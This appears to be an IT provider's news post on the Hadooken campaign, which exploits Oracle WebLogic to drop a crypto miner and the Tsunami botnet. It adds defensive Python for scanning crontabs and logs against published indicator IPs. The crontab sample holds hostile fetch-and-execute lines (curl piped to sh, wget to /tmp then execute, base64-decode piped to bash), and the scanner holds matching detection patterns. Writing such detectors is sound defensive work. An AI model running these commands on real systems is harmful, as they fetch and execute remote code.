New Linux Malware Campaign Targets Oracle WebLogic for Crypto Mining

Cybersecurity researchers have uncovered a sophisticated new malware campaign targeting Linux environments, specifically the Oracle WebLogic server, to conduct illicit cryptocurrency mining and deploy botnet malware.

The campaign, detailed by cloud security firm Aqua, leverages known vulnerabilities and misconfigurations in the WebLogic server to deliver a malware strain dubbed Hadooken. Once executed, Hadooken drops the Tsunami malware and deploys a cryptocurrency miner, allowing attackers to profit from the victim’s computing resources.

The attack chain begins by exploiting vulnerabilities or weak credentials to gain initial access to vulnerable instances. The attackers then launch two nearly identical payloads, one written in Python and the other a shell script, both of which retrieve the Hadooken malware from a remote server.

The shell script version also attempts to gather SSH credentials and other sensitive information from the compromised system to facilitate lateral movement within the network. This enables the malware to spread to additional systems and expand the attackers’ reach.

Hadooken is equipped with two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet called Tsunami. The miner is used to generate cryptocurrency, while the botnet can be used to launch attacks against other systems.

To ensure persistence, Hadooken creates cron jobs to run the cryptocurrency miner periodically, making it difficult to remove.
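As an added illustration, not part of the original article or of Aqua's research, the Python script below shows one way a defender can review crontab entries for the fetch-and-execute style of persistence described above. The crontab text, the IP addresses in it and the pattern names are constructed for the example; the heuristics are generic and are not the signatures Aqua published.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not taken from the article or from any real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * curl -fsSL http://198.51.100.7/payload.sh | sh
@reboot wget -q -O /tmp/.x http://203.0.113.9/x && chmod +x /tmp/.x && /tmp/.x
15 3 * * 0 /usr/local/bin/backup.sh
* * * * * echo ZWNobyBoaQ== | base64 -d | bash
"""

# Generic heuristics for cron-based persistence: remote fetch piped into a shell,
# downloads into world-writable directories, decode-and-execute, hidden binaries.
SUSPICIOUS_PATTERNS: Dict[str, re.Pattern] = {
    "remote_fetch_pipe_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "download_to_tmp": re.compile(r"\b(curl|wget)\b.*\s/(tmp|dev/shm|var/tmp)/"),
    "base64_decode_exec": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
    "hidden_path_exec": re.compile(r"/(tmp|dev/shm|var/tmp)/\.[^\s/]+"),
}


def parse_crontab(text: str) -> List[Dict[str, object]]:
    """Split crontab text into (schedule, command) entries, skipping comments and blank lines.

    Handles both the five-field schedule form and @reboot/@daily style entries.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            parts = line.split(None, 5)
            if len(parts) == 6:
                parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) != 2:
            continue  # malformed line; a real reviewer would log it
        entries.append({"line": lineno, "schedule": parts[0], "command": parts[1]})
    return entries


def flag_suspicious(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Attach the names of every heuristic that matches an entry's command."""
    findings = []
    for entry in entries:
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(str(entry["command"]))]
        if hits:
            findings.append({**entry, "indicators": hits})
    return findings


def scan_crontab_text(text: str) -> List[Dict[str, object]]:
    """Parse and flag in one step; returns only the entries worth a human look."""
    return flag_suspicious(parse_crontab(text))


if __name__ == "__main__":
    for finding in scan_crontab_text(SAMPLE_CRONTAB):
        print(f"line {finding['line']}: {finding['indicators']} -> {finding['command']}")
```

In practice the same function would be fed the output of `crontab -l` for each user plus the contents of /etc/crontab and /etc/cron.d; the heuristics flag commands for review, they do not prove compromise on their own.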

The campaign is linked to two IP addresses: 89.185.85[.]102 and 185.174.136[.]204. Both addresses are associated with Aeza International LTD, a bulletproof hosting service provider with a history of hosting cybercriminal activities. Aeza has been implicated in previous campaigns involving the 8220 Gang and other cybercrime groups.
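The two addresses above are published in defanged form. As an added example that is not part of the original article, the Python below refangs them, validates them as IP addresses and checks a handful of log lines for exact-token matches, so that a longer address containing one of the indicators as a substring is not reported as a hit. The log lines are constructed for the example; only the two indicator addresses come from the article.

```python
import ipaddress
import re
from typing import Dict, Iterable, List, Set

# The two indicators quoted in the article, kept in their defanged form.
DEFANGED_IOCS = ["89.185.85[.]102", "185.174.136[.]204"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("[.]", "hxxp") back into its literal form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def load_ioc_set(defanged: Iterable[str]) -> Set[str]:
    """Refang and validate each entry; a typo that is not a valid IP raises immediately."""
    return {str(ipaddress.ip_address(refang(i))) for i in defanged}


# Extract dotted-quad tokens only when not glued to other digits or dots,
# so "189.185.85.102" is seen as one address and never as "89.185.85.102".
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed sample lines: an access-log entry, an auth-log entry and a
# netstat-style connection line. None of these are from the article.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Sep/2024:12:01:22 +0000] "GET /console/ HTTP/1.1" 200 512',
    '89.185.85.102 - - [10/Sep/2024:12:03:10 +0000] "GET /console/ HTTP/1.1" 200 512',
    "Sep 10 12:05:01 weblogic01 sshd[2211]: Accepted publickey for deploy from 10.0.0.12 port 51022 ssh2",
    "tcp 0 0 10.0.0.30:49210 185.174.136.204:443 ESTABLISHED 4120/.x",
    '189.185.85.102 - - [10/Sep/2024:12:07:45 +0000] "GET /console/ HTTP/1.1" 200 512',
]


def scan_logs(lines: Iterable[str], iocs: Set[str]) -> List[Dict[str, object]]:
    """Return every line that contains at least one indicator as a whole IP token."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        matched = sorted(set(IPV4_RE.findall(line)) & iocs)
        if matched:
            hits.append({"line": lineno, "iocs": matched, "text": line})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, load_ioc_set(DEFANGED_IOCS)):
        print(f"line {hit['line']}: {hit['iocs']} :: {hit['text']}")
```

The same scanner can be pointed at WebLogic access logs for inbound hits and at firewall or connection-tracking output for outbound ones; the outbound direction is the more useful signal for a miner or botnet client that has already been dropped.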

This new malware campaign highlights the ongoing threat posed by cybercriminals targeting Linux environments. Organizations must remain vigilant and implement robust security measures to protect their systems from such attacks.

If you are a customer of ours and use Oracle WebLogic Server, let us know if we can be of any assistance.

Copyright © 2021-2024 GNET Communications Ltd